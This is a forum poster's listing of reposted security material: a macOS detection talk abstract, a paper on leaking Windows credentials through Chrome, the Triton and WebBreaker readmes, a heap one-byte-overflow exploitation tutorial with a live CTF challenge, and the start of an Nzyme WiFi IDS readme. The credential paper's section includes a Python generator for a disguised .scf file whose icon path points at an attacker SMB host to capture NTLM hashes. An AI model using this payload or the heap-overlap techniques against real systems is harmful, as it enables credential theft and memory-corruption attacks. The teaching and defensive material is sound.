Everything posted by Nytro
MacOS host monitoring - the open source way
Michael George, Derbycon 2017

MacOS host monitoring - the open source way: I will talk about an example piece of malware (Handbrake/Proton) and how you can use open source detection tooling to do detection and light forensics. Since I will be talking about the Handbrake malware, I will also be sharing some of the TTPs the malware used, in case you want to find this activity in your fleet.

Dropbox - Security Engineer. I work on the Incident Response team at Dropbox. I primarily work on host-based detection systems.

Sursa: http://www.irongeek.com/i.php?page=videos/derbycon7/s30-macos-host-monitoring-the-open-source-way-michael-george
Stealing Windows Credentials Using Google Chrome
Author/Researcher: Bosko Stankovic (bosko defensecode.com)
http://www.defensecode.com

Attacks that leak authentication credentials using the SMB file sharing protocol on Windows OS are an ever-present issue, exploited in various ways but usually limited to local area networks. One of the rare pieces of research involving attacks over the internet was presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference[1] [2] in 2015. However, there have been no publicly demonstrated SMB authentication related attacks on browsers other than Internet Explorer and Edge in the past decade. This paper describes an attack which can lead to Windows credentials theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it.

Download: https://www.exploit-db.com/docs/42015.pdf
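The attack described in the paper abuses Windows Shell Command Files (.scf), which Chrome's default configuration downloads without prompting and which Windows Explorer later parses when the download folder is viewed, fetching the remote "icon" over SMB and thereby leaking an NTLM authentication attempt. A minimal Python sketch of such a payload generator follows; the UNC host is a placeholder, not taken from the paper:

# Sketch: writes the kind of SCF payload the paper describes. When the
# victim's download folder is rendered, Explorer resolves IconFile over SMB,
# leaking an NTLM handshake to the attacker's listener.
scf_payload = "\r\n".join([
    "[Shell]",
    "Command=2",
    "IconFile=\\\\attacker.example.com\\share\\icon.ico",
    "[Taskbar]",
    "Command=ToggleDesktop",
])

with open("nothing-special.scf", "w") as f:
    f.write(scf_payload)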
Triton is a dynamic binary analysis (DBA) framework. It provides internal components like a Dynamic Symbolic Execution (DSE) engine, a Taint Engine, AST representations of the x86 and x86-64 instruction set semantics, SMT simplification passes, an SMT solver interface and, last but not least, Python bindings. Based on these components, you are able to build program analysis tools, automate reverse engineering and perform software verification. As Triton is still a young project, please don't blame us if it is not yet reliable. Open issues or pull requests are always better than trolling =). Full documentation is available on our Doxygen page.

Quick start
- Description
- Installation
- Examples
- Presentations and Publications

Internal documentation
- Dynamic Symbolic Execution
- Symbolic Execution Optimizations
- AST Representations of Semantics
- SMT Semantics Supported
- SMT Solver Interface
- SMT Simplification Passes
- Spread Taint
- Tracer Independent
- Python Bindings

News
A blog is available and you can follow us on twitter @qb_triton or via our RSS feed.

Support
IRC: #qb_triton@freenode
Mail: triton at quarkslab com

Authors
Jonathan Salwan - Lead dev, Quarkslab
Pierrick Brunet - Core dev, Quarkslab
Florent Saudel - Core dev, Bordeaux University
Romain Thomas - Core dev, Quarkslab

Cite Triton
@inproceedings{SSTIC2015-Saudel-Salwan,
  author    = {Florent Saudel and Jonathan Salwan},
  title     = {Triton: A Dynamic Symbolic Execution Framework},
  booktitle = {Symposium sur la s{\'{e}}curit{\'{e}} des technologies de l'information et des communications, SSTIC, France, Rennes, June 3-5 2015},
  publisher = {SSTIC},
  pages     = {31--54},
  year      = {2015},
}

Sursa: https://github.com/JonathanSalwan/Triton
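As a quick taste of the Python bindings mentioned above, here is a minimal sketch that lifts a single x86-64 instruction through Triton's semantics. The class-based names follow recent Triton releases (older versions exposed module-level functions instead), so treat the exact API as an assumption:

# Minimal Triton sketch (assumes a recent release exposing TritonContext).
from triton import TritonContext, ARCH, Instruction

ctx = TritonContext()
ctx.setArchitecture(ARCH.X86_64)

# b"\x48\x89\xd8" encodes: mov rax, rbx. processing() disassembles the
# instruction and builds its symbolic expressions via the DSE engine.
inst = Instruction(b"\x48\x89\xd8")
ctx.processing(inst)
print(inst)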
Introduction
Build functional security testing into your software development and release cycles! WebBreaker provides the capabilities to automate and centrally manage Dynamic Application Security Testing (DAST) as part of your DevOps pipeline. WebBreaker truly enables all members of the Software Security Development Life-Cycle (SDLC) with access to security testing, greater test coverage, and increased visibility by providing Dynamic Application Security Test Orchestration (DASTO). Current support is limited to the world's most popular commercial DAST product, WebInspect.

System Architecture

Supported Features
- Command-line (CLI) scan administration of WebInspect with Fortify SSC products.
- Jenkins Environmental Variable & String Parameter support (i.e. $BUILD_TAG)
- Docker container v17.x support
- Custom email alerting or notifications for scan launch and completion.
- Extensible event logging for scan administration and results.
- WebInspect REST API support for v9.30 and later.
- Fortify Software Security Center (SSC) REST API support for v16.10 and later.
- WebInspect scan cluster support between two (2) or more WebInspect servers/sensors.
- Capabilities for extensible scan telemetry with ELK and Splunk.
- GIT support for centrally managing WebInspect scan configurations.
- Replaces most functionality of Fortify's fortifyclient
- Python compatibility with versions 2.x or 3.x
- Provides AES 128-bit key management for all secrets from the Fernet encryption Python library.

Quick Local Installation and Configurations
Installing WebBreaker from source:

git clone https://github.com/target/webbreaker
pip install -r requirements.txt
python setup.py install

Configuring WebBreaker:
- Point WebBreaker to your WebInspect API server(s) by editing: webbreaker/etc/webinspect.ini
- Point WebBreaker to your Fortify SSC URL by editing: webbreaker/etc/fortify.ini
- SMTP settings for email notifications and a message template can be edited in webbreaker/etc/email.ini
- Mutually exclusive remote GIT repos created by users are encouraged, to persist WebInspect settings, policies, and webmacros. Simply add the GIT URL to webinspect.ini and their respective directories.

NOTES:
- Required: As with any Python application that contains library dependencies, pip is required for installation.
- Optional: Include your Python site-packages, if they are not already in your $PATH, with export PATH=$PATH:$PYTHONPATH.

Usage
WebBreaker is a command-line interface (CLI) client. See our complete WebBreaker Documentation for further configuration, usage, and installation. The CLI supports upper-level and lower-level commands with respective options to enable interaction with Dynamic Application Security Test (DAST) products. Currently, the two products supported are WebInspect and Fortify (more to come in the future!!). Below is a cheatsheet of supported commands to get you started.
List all WebInspect scans:
webbreaker webinspect list --server webinspect-1.example.com:8083

Query WebInspect scans:
webbreaker webinspect list --server webinspect-1.example.com:8083 --scan_name important_site

List with http:
webbreaker webinspect list --server webinspect-1.example.com:8083 --protocol http

Download WebInspect scan from server or sensor:
webbreaker webinspect download --server webinspect-2.example.com:8083 --scan_name important_site_auth

Download WebInspect scan as XML:
webbreaker webinspect download --server webinspect-2.example.com:8083 --scan_name important_site_auth -x xml

Download WebInspect scan with http (no SSL):
webbreaker webinspect download --server webinspect-2.example.com:8083 --scan_name important_site_auth --protocol http

Basic WebInspect scan:
webbreaker webinspect scan --settings important_site_auth

Advanced WebInspect scan with scan overrides:
webbreaker webinspect scan --settings important_site_auth --allowed_hosts example.com --allowed_hosts m.example.com

Scan with local WebInspect settings:
webbreaker webinspect scan --settings /Users/Matt/Documents/important_site_auth

Initial Fortify SSC listing with authentication (SSC token is managed for 1 day):
webbreaker fortify list --fortify_user matt --fortify_password abc123

Interactive listing of all Fortify SSC application versions:
webbreaker fortify list

List Fortify SSC versions by application (case sensitive):
webbreaker fortify list --application WEBINSPECT

Upload to Fortify SSC with command-line authentication:
webbreaker fortify upload --fortify_user $FORT_USER --fortify_password $FORT_PASS --version important_site_auth

Upload to Fortify SSC with interactive authentication & application version configured with fortify.ini:
webbreaker fortify upload --version important_site_auth --scan_name auth_scan

Upload to Fortify SSC with application/project & version name:
webbreaker fortify upload --application my_other_app --version important_site_auth --scan_name auth_scan

WebBreaker Console Output
webbreaker webinspect scan --settings MyCustomWebInspectSetting --scan_policy Application --scan_name some_scan_name

 _       __     __    ____                  __
| |     / /__  / /_  / __ )________  ____ _/ /_____  _____
| | /| / / _ \/ __ \/ __  / ___/ _ \/ __ `/ //_/ _ \/ ___/
| |/ |/ /  __/ /_/ / /_/ / /  /  __/ /_/ / ,< /  __/ /
|__/|__/\___/_.___/_____/_/   \___/\__,_/_/|_|\___/_/

Version 1.2.0

JIT Scheduler has selected endpoint https://some.webinspect.server.com:8083.
WebInspect scan launched on https://some.webinspect.server.com:8083 your scan id: ec72be39-a8fa-46b2-ba79-10adb52f8adb !!

Scan results file is available: some_scan_name.fpr
Scan has finished.
Webbreaker complete.

Bugs and Feature Requests
Found something that doesn't seem right or have a feature request? Please open a new issue.

Copyright and License
Copyright 2017 Target Brands, Inc. Licensed under MIT.

Sursa: https://github.com/target/webbreaker
Linux Heap Exploitation Intro Series: The magicians cape – 1 Byte Overflow
Reading time ~21 min
Posted by javier on 20 September 2017
Categories: Heap, Heap linux, Heap overflow

Intro
Hello again! It's been a while since the last blog post. This is due to not having as much time as we wanted, but hopefully you all kept pace with these heapy things, as they are easy to forget due to the heavy amount of little details the heap involves. In this post we are going to demonstrate how a single byte overflow, with a user-controlled value, can make chunks disappear from the implementation's view, like a magician who puts a cape on top of objects (chunks) and makes them disappear.

The Vulnerability

Preface
For the second part of our series we are going for another rather common vulnerability happening out there. From my own experience, it is sometimes confusing and hard to get the sizes right for elements (be it arrays, allocations, variables in general) because of the confusion between declaring "something" and actually accessing each element (i.e. byte) of that "something". I know, it sounds weird, but look at the following code:

int array_of_integers[10]; // (1)
int i;

for (i = 1; i <= 10; i++) // (2)
{
    array_of_integers[i] = 1; // (3)
}

In this code, we wanted to have an array of ten integers (1) and then iterate over the array (2) and set every element of the array to the number 1. As you might or might not know, the first element of an array is not at index one; in C, indices start with zero (array_of_integers[0]). What will happen here is that when the variable i reaches 10, the code will try to write to array_of_integers[10], which is not allocated, effectively performing an out-of-bounds write, exactly 4 bytes past the end, as 4 bytes is the size of an int.

Also, keeping pace with the ptmalloc2 implementation and to keep these blog posts as "fresh" and "new" as possible, here we have a fairly new exploit against SAPCAR (CVE-2017-8852) by CoreSecurity that takes advantage of a buffer overflow happening in the heap. It's an easy and cool read!

What
This kind of vulnerability falls into the category of buffer overflows or out-of-bounds accesses. Specifically, in this blog post we are going to see what could happen in the case of an out-of-bounds 1 byte write. At first glance one could think there are not many possibilities in just writing one byte but, if we remember how an allocated chunk is placed into memory, we begin to "believe":

+-+-+-+-+-+-+-+-+-+-+-+-+
| PREV_SIZE OR USER DATA| <-- Previous Chunk Data (OVERFLOW HERE)
+-----------------+-+-+-+ <-- Chunk start
| CHUNK SIZE      |A|M|P|
+-----------------+-+-+-+
| USER DATA             |
|                       |
| - - - - - - - -       |
| PREV_SIZE OR USER DATA|
+-----------------------+ <-- End of chunk

As we can see, a 1 byte overwrite will mess up the Main Arena (A), Is MMaped (M) and Previous in-use (P) bits as well as overwriting the first byte of the CHUNK SIZE. The implications of this type of vulnerability are (cliché) endless: changing the previous in-use bit, leading to strange memory corruptions that, when free()'ing maliciously crafted memory, would lead to arbitrary overwrite (overwriting pointers to functions); or shrinking or growing adjacent chunks by tampering with the next chunk's size, thus leading to chunks overlapping or memory fragmentation, which would lead to use-after-invalidation bugs (memory leaks, use-after-free, etc.).

When stars collide one byte
To prepare the scenario for this kind of vulnerability, I drew heavily on the Forgotten Chunks[1] paper by Context.
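As an aside before building the scenario: the following small Python sketch shows how ptmalloc2 packs those A/M/P flags into the low bits of the size field (flag values as defined in glibc's malloc.c), which is exactly what a one-byte overflow of the size's low byte clobbers:

# The three low bits of a chunk's size field are flags, not size.
NON_MAIN_ARENA = 0x4  # A: chunk belongs to a non-main arena
IS_MMAPPED     = 0x2  # M: chunk was allocated via mmap()
PREV_INUSE     = 0x1  # P: previous chunk is in use

size_field = 0x150 | PREV_INUSE       # a 0x150-byte chunk, prev chunk in use
print(hex(size_field & ~0x7))         # 0x150 -> the actual chunk size
print(bool(size_field & PREV_INUSE))  # True  -> previous chunk is allocated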
I took my own way in the sense that I decided to build two proof of concepts for the techniques described there, as well as a challenge for you to test out!

One byte write
In this scenario we have the following: there are three allocated chunks, and the first of them, A, is the one vulnerable to our one byte overflow. To simplify things, we can write into the first two chunks A and B but not into the third chunk C. We can read from all of them. Let's see the initial state of the heap in our beloved chunky-ascii-art:

+---HEAP GROWS UPWARDS
|
|  +-+-+-+-+-+-+
|  | CHUNK A   | <-- Read/Write
|  +-----------+
|  | CHUNK B   | <-- Read/Write
|  +-----------+
|  | CHUNK C   | <-- Read
|  +-----------+
|  | TOP       |
|  |           |
V  |           |
   +-----------+

Our goal is to write into chunk C. To do so, we would need the following to happen.

1 – Prior to any overflows, and to prevent memory corruptions (because we are going to overflow into chunk B), the first thing to make happen is to free() chunk B.

+---HEAP GROWS UPWARDS
|
|  +-+-+-+-+-+-+
|  | CHUNK A   | <-- Read/Write
|  +-----------+
|  | FREE B    |
|  +-----------+
|  | CHUNK C   | <-- Read
|  +-----------+
|  | TOP       |
|  |           |
V  |           |
   +-----------+

2 – Now that chunk B is free, we are going to trigger the one byte overflow that is present in chunk A and overflow one byte into chunk B. This will change the first byte of chunk B's size – in our case, we will make it grow. Let's say that our chunks are of the following sizes: A(0x100-WORD_SIZE), B(0x100-WORD_SIZE), C(0x40-WORD_SIZE).

Let me state that WORD_SIZE is a variable that will be 8 on 64-bit systems and 4 on 32-bit systems. This was already explained in the Painless Intro to ptmalloc2 blog post but, again: this WORD_SIZE is subtracted from the size we actually want because it is the size that the chunk's size header will take in memory. So, to keep the chunks within the size we expect (0x100 or 0x40), we subtract the size header's size (WORD_SIZE) to prevent padding to the next WORD_SIZE*2 size. I know this is too condensed, but being able to understand this is a must in order to proceed.

By now we can see where all this goes, right? That's it: we are about to overwrite chunk B's size to make it big enough to cover B+C. So, we know that B is 0x100 and C is 0x40; then let me ask you a question: with which byte would we need to overflow A so that, once it lands in B's size, it completely overlaps C on a 64-bit system?

a) 0x40
b) 0x41
c) 0x48

That's right, none of them. We shouldn't choose even values because all of these, in binary, leave the last bit unset. This means that the PREV_INUSE bit will be set to zero, creating a memory corruption in some cases, as chunk A is not really free. That leaves 0x40 and 0x48 out. If you chose 0x48, you might know the reason why 0x41 is not valid to completely overlap C: because we need to add 8 bytes for C's size header, placed just after B. The right answer is 0x51, as it keeps the PREV_INUSE bit set and is the next 16-byte padded size (0x48 rounded up to 0x50). Enough chit-chat, but it was necessary.
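If you want to double-check the arithmetic behind that answer, here is a quick sketch of the size computation described above:

# Sanity check for 0x51: B's new size must cover B, C's data and C's size
# header, rounded up to ptmalloc2's 16-byte granularity on 64-bit systems,
# with the PREV_INUSE bit kept set.
WORD_SIZE = 8                          # 64-bit system
b_size, c_size = 0x100, 0x40
needed = b_size + c_size + WORD_SIZE   # 0x148: B + C + C's size header
padded = (needed + 0xF) & ~0xF         # 0x150: next 16-byte aligned size
print(hex(padded | 0x1))               # 0x151 -> the overflow byte is 0x51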
Remember that B is free()'d, so B->fd and B->bk (pointers to the next and previous free chunks, if any) are set, as well as the next chunk's (C) PREV_SIZE:

-=Data gets populated from right to left and from top to bottom=-

+-----------------+-+-+-+
|CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit)
+-----------------+-+-+-+
|\x51\x51\x51\x51\x51\x51|
|\x51\x51\x51\x51\x51\x51|
|\x51\x51\x51\x51\x51\x51|
|\x51\x51\x51\x51\x51\x51|
+-----------------+-+-+-+
|FREE B SIZE = \x01\x51| <-- Size Overflown 0x151
+-----------------+-+-+-+
|B->fd = main_arena->TOP|
|B->bk = main_arena->TOP|
+-----------------------+
|PREV_SIZE B = \x01\x01| <-- PREV_SIZE now doesn't match B size
+-----------------------+
|CHUNK C SIZE = \x41| <-- 0x40 + 0x1
+-----------------+-+-+-+
|                       |
|                       |
|                       |
|                       |
+-----------------------+
| TOP                   | <-- B->fd and B->bk point here
+-----------------------+
|                       |
|                       |
|                       |
|                       |
+-----------------------+

3 – OK! The buffer overflow has been triggered and chunk B's size has been changed to 0x151. What should happen now to overlap into chunk C? We would need an allocation of a size near to: old B size + C size = 0x100 + 0x40. When the following allocation happens:

B = malloc(0x100+0x40);

chunk B will now be overlapping chunk C in its entirety, as we can see in the following figure.

-=Data gets populated from right to left and from top to bottom=-

<--- 8 bytes wide --->
+-----------------+-+-+-+
|CHUNK A SIZE = \x01\x01|
+-----------------+-+-+-+
|\x51\x51\x51\x51\x51\x51|
|\x51\x51\x51\x51\x51\x51|
|\x51\x51\x51\x51\x51\x51|
|\x51\x51\x51\x51\x51\x51|
+-----------------+-+-+-+
|CHUNK B SIZE = \x01\x51| <-- Size Overflown 0x151
+-----------------+-+-+-+
|B->fd = main_arena->TOP| <-- Even if allocated...
|B->bk = main_arena->TOP| <-- ...memory isn't cleared and...
+-----------------------+
|PREV_SIZE B = \x01\x01| <-- ...values are kept in memory.
+-----------------------+
|CHUNK C SIZE = \x41|
+-----------------+-+-+-+
|                       |
|                       |
|                       |
|                       |
+-----------------------+ <-- B now takes up to here (1)
| TOP                   |
+-----------------------+
|                       |
|                       |
|                       |
|                       |
+-----------------------+

(1) The "mathemata" out there must have spotted that chunk B actually goes 8 bytes into TOP, but that is not a problem for us for now.

4 – As a last step, we would just need to write into chunk B at our desired position, effectively achieving our main goal: writing into chunk C.

-=Data gets populated from right to left and from top to bottom=-

<--- 8 bytes wide --->
+-----------------+-+-+-+
|CHUNK A SIZE = \x01\x01|
+-----------------+-+-+-+
|\x51\x51\x51\x51\x51\x51|
|\x51\x51\x51\x51\x51\x51|
|\x51\x51\x51\x51\x51\x51|
|\x51\x51\x51\x51\x51\x51|
+-----------------+-+-+-+
|CHUNK B SIZE = \x01\x51|
+-----------------+-+-+-+
|\x42\x42\x42\x42\x42\x42| <-- Setting all B to hex('B') = '\x42'
|\x42\x42\x42\x42\x42\x42|
+-----------------------+
|\x42\x42\x42\x42\x42\x42|
+-----------------------+
|\x42\x42\x42\x42\x42\x42|
+-----------------+-+-+-+
|\x42\x42\x42\x42\x42\x42| <-- chunk C got overlapped and written
|\x42\x42\x42\x42\x42\x42|
|\x42\x42\x42\x42\x42\x42|
|\x42\x42\x42\x42\x42\x42|
+-----------------------+
| TOP                   |
+-----------------------+
|                       |
|                       |
|                       |
|                       |
+-----------------------+

Cool. If, before filling all of chunk B with \x42, the "magically disappeared" chunk C gets free()'d, we will be able to leak pointers to main_arena->top by reading the contents of B. Also, if C is still used, we can control the data inside it by writing at high positions in B. There are many more possibilities!
One null byte write
This scenario is initially the same as the previous one, except that the sizes are A(0x100), B(0x250) and C(0x100); also, we can only overflow with a null byte \x00. As the first steps are the same as in the one byte write, we are going straight into the null byte overflow. Note that this one is more likely to happen in practice because, in C, all strings must be terminated with the "null byte". Our goal here is to make the implementation forget about an allocated chunk by overlapping it with free space.

1 – We overflow in the same way as before, but what is going to happen is a pretty different thing. We are shrinking the size of chunk B from 0x250 to 0x200.

-=Data gets populated from right to left and from top to bottom=-

+-----------------+-+-+-+
|CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit)
+-----------------+-+-+-+
| EREH OG NAC GNIRTS YNA| <-- ANY STRING CAN GO HERE
|     EB LLIW TI ESUACEB| <-- BECAUSE IT WILL BE
|        DETANIMRET LLUN| <-- NULL TERMINATED
|AAAAAAAAAAAAAAAAAAAAAAA|
+-----------------+-+-+-+
|FREE B SIZE = \x02\x00| <-- Size byte overflown 0x250 --> 0x200
+-----------------+-+-+-+
|B->fd = main_arena->TOP|
|B->bk = main_arena->TOP|
|                       |
|                       | <-- Free B ends here now (1)
|                       |
|                       |
+-----------------------+ <-- Free space still ends here (2)
|PREV_SIZE B = \x02\x50| <-- C PREV_SIZE doesn't match B size
+-----------------------+
|CHUNK C SIZE = \x01\x00| <-- PREV_INUSE is zero now.
+-----------------+-+-+-+
|                       |
|                       |
+-----------------------+
| TOP                   |
+-----------------------+
|                       |
|                       |
|                       |
|                       |
+-----------------------+

Chunk B has shrunk (1) and this will have its consequences. The first and easiest to see is that chunk C's PREV_SIZE (remember that this value is used to merge free chunks) is different from the actual chunk B size. The second consequence is that, for the implementation, the free space between chunk A and chunk C (2) is somewhat "divided" from the implementation's perspective (it is corrupted already). These consequences together have a third and final consequence. If we allocate two new chunks (J and K) of smaller size than 0x200/2 (0x100)...

2 – ...the implementation is going to properly allocate these in the space of chunk B, because there is space for two chunks of size, let's say, 0x80.

-=Data gets populated from right to left and from top to bottom=-

+-----------------+-+-+-+
|CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit)
+-----------------+-+-+-+
| EREH OG NAC GNIRTS YNA|
|     EB LLIW TI ESUACEB|
|        DETANIMRET LLUN|
|AAAAAAAAAAAAAAAAAAAAAAA|
+-----------------+-+-+-+
|CHUNK J SIZE = \x00\x81|
+-----------------+-+-+-+
|                       |
|                       |
+-----------------------+
|CHUNK K SIZE = \x00\x81|
+-----------------------+
|                       |
|                       |
+-----------------------+
|PREV_SIZE B = \x02\x50| <-- C PREV_SIZE doesn't match B size
+-----------------------+
|CHUNK C SIZE = \x01\x00|
+-----------------+-+-+-+
|                       |
|                       |
+-----------------------+
| TOP                   |
+-----------------------+
|                       |
|                       |
|                       |
|                       |
+-----------------------+

Not much to explain about two simple allocations. This leads us to the final part. Can you see which chunk is about to disappear from the implementation's view (a Forgotten Chunk)?

3 – Finally, if we free() chunk J and chunk C, in that order, the unlink macro will kick in and merge both chunks into one free space. So, which chunk is under the cape formed by chunks J and C? That's right, the newly allocated chunk K. First, chunk J is free()'d – note that K's PREV_INUSE is zero now due to the previous chunk J being free.
-=Data gets populated from right to left and from top to bottom=-

+-----------------+-+-+-+
|CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit)
+-----------------+-+-+-+
| EREH OG NAC GNIRTS YNA|
|     EB LLIW TI ESUACEB|
|        DETANIMRET LLUN|
|AAAAAAAAAAAAAAAAAAAAAAA|
+-----------------+-+-+-+
|FREE J SIZE = \x00\x81| (3)
+-----------------+-+-+-+
|J->fd = main_arena->TOP|
|J->bk = main_arena->TOP|
+-----------------------+
|CHUNK K SIZE = \x00\x80|
+-----------------------+
|                       |
|                       |
+-----------------------+
|PREV_SIZE B = \x02\x50| (2)
+-----------------------+
|CHUNK C SIZE = \x01\x00| (1)
+-----------------+-+-+-+
|                       |
|                       |
+-----------------------+
| TOP                   |
+-----------------------+
|                       |
|                       |
|                       |
|                       |
+-----------------------+

4 – Then, we free() C. Now pay close attention to the following:
– Chunk C's PREV_INUSE bit is unset (1)
– Chunk C's PREV_SIZE is still the old B size, 0x250 (2)
– Chunk J is also free and at the position of old B (0x250 bytes back from chunk C) (3)

They are explained in reverse order because this is exactly the order in which the unlink macro goes over them. It checks that the currently free()'d chunk has its PREV_INUSE bit unset (1), then proceeds to merge with the other free()'d chunk, which is at C - PREV_SIZE = J. Now J and C are merged into one big free space at J. Poor K was in the middle of this merge situation and is now treated as free space – ptmalloc2 forgot about him.

-=Data gets populated from right to left and from top to bottom=-

+-----------------+-+-+-+
|CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit)
+-----------------+-+-+-+
| EREH OG NAC GNIRTS YNA|
|     EB LLIW TI ESUACEB|
|        DETANIMRET LLUN|
|AAAAAAAAAAAAAAAAAAAAAAA|
+-----------------+-+-+-+
|FREE J SIZE = \x03\x51| <-- Free size starting here
+-----------------+-+-+-+
|J->fd = main_arena->TOP|
|J->bk = main_arena->TOP|
+ - - - - - - - - - - - +
|  CHUNK K FORGOTTEN!   |
+ - - - - - - - - - - - +
|                       |
|                       |
+ - - - - - - - - - - - +
|                       |
|                       |
|                       |
|                       |
|                       |
|                       |
+-----------------------+ <-- Free size ends here
| TOP                   |
+-----------------------+
|                       |
|                       |
|                       |
|                       |
+-----------------------+

Now chunk K is inside the newly free()'d area, which again has nearly the same implications as the previous scenario: use-after-invalidation, leaks, arbitrary writes, etc.

The playground
Let's go have some fun! As in the previous post of the series, I am trying to create a tradition by providing proof of concepts and a challenge! You can get the playground's code here: Download Playground Code

In order to not make this blog post longer than expected, the proof of concepts provided are directly related to the "When stars collide" section. Worry not, for I have heavily commented each PoC. But wait! Don't think I would be that lazy! Here, have some videos and a little explanation.

One byte write
This PoC is based around writing to chunk C. An X is written to a point in B after the vulnerability is triggered. This point in chunk B is exactly the second-to-last byte in the overlapped C.

One null byte write
This one corresponds to the second scenario, with the difference that instead of creating J and K chunk variables, I have reused the B variable and just added an X variable to hold the fourth chunk. This chunk X is the one to be overlapped and overwritten, as we can see in the following video.

Now you
This second challenge is on 178.62.74.135 on ports 10000 and 10001. Your goal is to retrieve the flag by overlapping a chunk that you cannot read directly from – the vulnerable chunk is A!
nc 178.62.74.135 10000 -v
nc 178.62.74.135 10001 -v

The flag is in the form: SP{contents_of_the_flag}. Note that you must send us your exploit source code to be eligible to win! The winner will receive a SensePost shirt and will be chosen based on the following criteria:
– Originality – Programming language, code length, formatting, comments, etc.
– Accuracy – Did you do the maths or brute force it?

Hints
– There are 3 allocated chunks already: A(0x100), B(0x100) & C(0x80)
– Values with the last 3 bits set can cause weird behaviour
– There are hidden easter eggs for those trying to break things further
– You can either calculate it or brute force it. Your call!
– No, you don't need to solve the 2016 challenge

References
[1] Glibc Adventures: The Forgotten Chunks
Chris Evans/Tavis Ormandy – Single NUL byte overflow
Painless intro to the linux userland heap

Sursa: https://sensepost.com/blog/2017/linux-heap-exploitation-intro-series-the-magicians-cape-1-byte-overflow/
Nzyme

Introduction
Nzyme collects 802.11 management frames directly from the air and sends them to a Graylog (open source log management) setup for WiFi IDS, monitoring, and incident response. It only needs a JVM and a WiFi adapter that supports monitor mode. Think about this like a long-term (months or years) distributed Wireshark/tcpdump that can be analyzed and filtered in real-time, using a powerful UI. If you are new to the fascinating space of WiFi security, you might want to read my Common WiFi Attacks And How To Detect Them blog post.

What kind of data does it collect?
Nzyme collects, parses and forwards all relevant 802.11 management frames. Management frames are unencrypted, so anyone close enough to a sending station (an access point, a computer, a phone, a lightbulb, a car, a juice maker, ...) can pick them up with nzyme.
- Association request
- Association response
- Probe request
- Probe response
- Beacon
- Disassociation
- Authentication
- Deauthentication

What do I need to run it?
Everything you need is available from Amazon Prime and is not very expensive. There is even a good chance you have the parts around already.

One or more WiFi adapters that support monitor mode on your operating system. The most important component is one (or more) WiFi adapters that support monitor mode. Monitor mode is the special state of a WiFi adapter that makes it read and report all 802.11 frames, and not only certain management frames or frames of a network it is connected to. You could also call this mode sniffing mode: the adapter just spits out everything it sees on the channel it is tuned to. The problem is that many adapter/driver/operating system combinations do not support monitor mode. The internet is full of compatibility information, but here are the adapters I run nzyme with on a Raspberry Pi 3 Model B:
- ALFA AWUS036NH - 2.4Ghz and 5Ghz (Amazon Prime, about $40)
- ALFA AWUS036NEH - 2.4Ghz (Amazon Prime, about $50)
If you have another one that supports monitor mode, you can use that one. Nzyme does by far not require any specific hardware.

A small computer to run nzyme on. I recommend running nzyme on a Raspberry Pi 3 Model B. This is pretty much the reference architecture, because that is what I run it on. In the end, it shouldn't really matter what you run it on, but the docs and guides will most likely refer to a Raspberry Pi with Raspbian on it.

A Graylog setup. You need a Graylog setup with a GELF TCP input that is reachable by your nzyme sensors.

Channel hopping
The 802.11 standard defines many frequencies (channels) a network can operate on. This is useful to avoid contention and bandwidth issues, but also means that your wireless adapter has to be tuned to a single channel. During normal operations, your operating system will do this automatically for you. Because we don't want to listen on only one, but possibly all WiFi channels, we either need dozens of adapters, with one adapter for each channel, or we cycle over multiple channels on a single adapter rapidly. Nzyme allows you to configure multiple channels per WiFi adapter. For example, if you configure nzyme to listen on channels 1,2,3,4,5,6 on wlan0 and 7,8,9,10,11 on wlan1, it will tune wlan0 to channel 1 for a configurable time (default is 1 second), then switch to channel 2, then to channel 3, and so on. By doing this, we might miss a bunch of wireless frames but are not missing out on some channels completely. The best configuration depends on your use-case, but usually you will want to tune to all 2.4 GHz and 5 GHz WiFi channels.
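For example, the wlan0/wlan1 split described above would be expressed like this in nzyme.conf (the channels syntax matches the configuration examples shown further down):

channels = wlan0:1,2,3,4,5,6|wlan1:7,8,9,10,11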
On Linux, you can get a list of channels your WiFi adapter supports like this:

$ iwlist wlan0 channel
wlan0     32 channels in total; available frequencies :
          Channel 01 : 2.412 GHz
          Channel 02 : 2.417 GHz
          Channel 03 : 2.422 GHz
          Channel 04 : 2.427 GHz
          Channel 05 : 2.432 GHz
          Channel 06 : 2.437 GHz
          Channel 07 : 2.442 GHz
          Channel 08 : 2.447 GHz
          Channel 09 : 2.452 GHz
          Channel 10 : 2.457 GHz
          Channel 11 : 2.462 GHz
          Channel 12 : 2.467 GHz
          Channel 13 : 2.472 GHz
          Channel 14 : 2.484 GHz
          Channel 36 : 5.18 GHz
          Channel 38 : 5.19 GHz
          Channel 40 : 5.2 GHz
          Channel 44 : 5.22 GHz
          Channel 46 : 5.23 GHz
          Channel 48 : 5.24 GHz
          Channel 52 : 5.26 GHz
          Channel 54 : 5.27 GHz
          Channel 56 : 5.28 GHz
          Channel 60 : 5.3 GHz
          Channel 62 : 5.31 GHz
          Channel 64 : 5.32 GHz
          Channel 100 : 5.5 GHz
          Channel 102 : 5.51 GHz
          Channel 104 : 5.52 GHz
          Channel 108 : 5.54 GHz
          Channel 110 : 5.55 GHz
          Channel 112 : 5.56 GHz
          Current Frequency:2.432 GHz (Channel 5)

Things to keep in mind
A few general things to know before you get started:
- Success will highly depend on how well supported your WiFi adapters and drivers are. Use the recommended adapters for best results. You can get them from Amazon Prime and have them ready in one or two days.
- At least on OSX, your adapter will not switch channels when already connected to a network. Make sure to disconnect from networks before using nzyme with the on-board WiFi adapter. On other systems, switching to monitor mode should disconnect the adapter from a possibly connected network.
- Nzyme works well with both the OpenJDK or the Oracle JDK and requires Java 7 or 8.
- WiFi adapters can draw quite some current, and I have seen Raspberry Pi 3's shut down when connecting more than 3 ALFA adapters. Consider this before buying tons of adapters.

Testing on a MacBook
(You can skip this and go straight to a real installation on a Raspberry Pi, or install it on any other device that runs Java and has supported WiFi adapters connected to it.)

Requirements
